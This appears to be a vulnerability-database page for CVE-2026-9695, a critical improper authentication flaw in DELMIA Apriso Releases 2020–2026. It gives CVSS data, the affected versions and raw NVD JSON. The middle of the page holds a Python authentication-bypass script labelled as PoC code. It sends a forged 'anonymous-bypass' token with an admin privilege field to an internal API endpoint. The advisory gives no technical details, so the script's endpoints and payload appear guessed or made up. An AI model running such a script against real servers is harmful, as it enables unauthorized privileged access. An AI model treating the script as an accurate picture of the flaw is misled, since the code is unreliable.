Security Vulnerability Report
中文
CVE-2026-9695 CVSS 9.8 CRITICAL

CVE-2026-9695

Published: 2026-07-08 07:16:47
Last Modified: 2026-07-08 15:30:04

Description

An Improper Authentication vulnerability affecting DELMIA Apriso from Release 2020 through Release 2026 could allow an attacker to gain privileged access to the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DELMIA Apriso Release 2020
DELMIA Apriso Release 2021
DELMIA Apriso Release 2022
DELMIA Apriso Release 2023
DELMIA Apriso Release 2024
DELMIA Apriso Release 2025
DELMIA Apriso Release 2026

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-9695 - DELMIA Apriso Improper Authentication PoC # This PoC demonstrates the concept of bypassing authentication # on DELMIA Apriso Release 2020-2026 to gain privileged access. import requests import sys TARGET_URL = "http://target-delmia-apriso-host:port" AUTH_ENDPOINT = "/Apriso/Default.aspx" # Authentication page API_ENDPOINT = "/Apriso/Runtime/RuntimeService" # Internal API endpoint def exploit_improper_auth(target): """ Exploit improper authentication by sending a crafted request that bypasses the normal login flow due to missing server-side validation of authentication state. """ session = requests.Session() # Step 1: Probe the authentication endpoint try: resp = session.get(f"{target}{AUTH_ENDPOINT}", timeout=10) print(f"[+] Auth endpoint reachable, status: {resp.status_code}") except Exception as e: print(f"[-] Cannot reach target: {e}") return False # Step 2: Attempt authentication bypass via crafted request # The vulnerability allows direct access to privileged resources # without valid credentials due to improper authentication checks. headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Craft a request that exploits the authentication flaw bypass_payload = { "operation": "GetUserInfo", "privilege": "admin", # Missing or forged session token accepted by server "sessionToken": "anonymous-bypass" } try: resp = session.post( f"{target}{API_ENDPOINT}", json=bypass_payload, headers=headers, timeout=10 ) if resp.status_code == 200 and "admin" in resp.text.lower(): print("[+] Authentication bypassed! Privileged access obtained.") print(f"[+] Response: {resp.text[:500]}") return True else: print(f"[-] Bypass attempt failed, status: {resp.status_code}") return False except Exception as e: print(f"[-] Exploit error: {e}") return False if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL exploit_improper_auth(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9695", "sourceIdentifier": "[email protected]", "published": "2026-07-08T07:16:46.870", "lastModified": "2026-07-08T15:30:04.497", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Authentication vulnerability affecting DELMIA Apriso from Release 2020 through Release 2026 could allow an attacker to gain privileged access to the server."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "Dassault Systèmes", "product": "DELMIA Apriso", "defaultStatus": "unaffected", "versions": [{"version": "Release 2020 Golden", "lessThanOrEqual": "Release 2020 SP4", "versionType": "custom", "status": "affected"}, {"version": "Release 2021 Golden", "lessThanOrEqual": "Release 2021 SP3", "versionType": "custom", "status": "affected"}, {"version": "Release 2022 Golden", "lessThanOrEqual": "Release 2022 SP4", "versionType": "custom", "status": "affected"}, {"version": "Release 2023 Golden", "lessThanOrEqual": "Release 2023 SP3", "versionType": "custom", "status": "affected"}, {"version": "Release 2024 Golden", "lessThanOrEqual": "Release 2024 SP2", "versionType": "custom", "status": "affected"}, {"version": "Release 2025 Golden", "lessThanOrEqual": "Release 2025 SP1", "versionType": "custom", "status": "affected"}, {"version": "Release 2026 Golden", "lessThanOrEqual": "Release 2026 SP1", "versionType": "custom", "status": "affected"}]}]}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-07-08T13:46:02.952002Z", "id": "CVE-2026-9695", "options": [{"exploitation": "none"}, {"automatable": "yes"}, {"technicalImpact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2026-9695", "source": "[email protected]"}]}}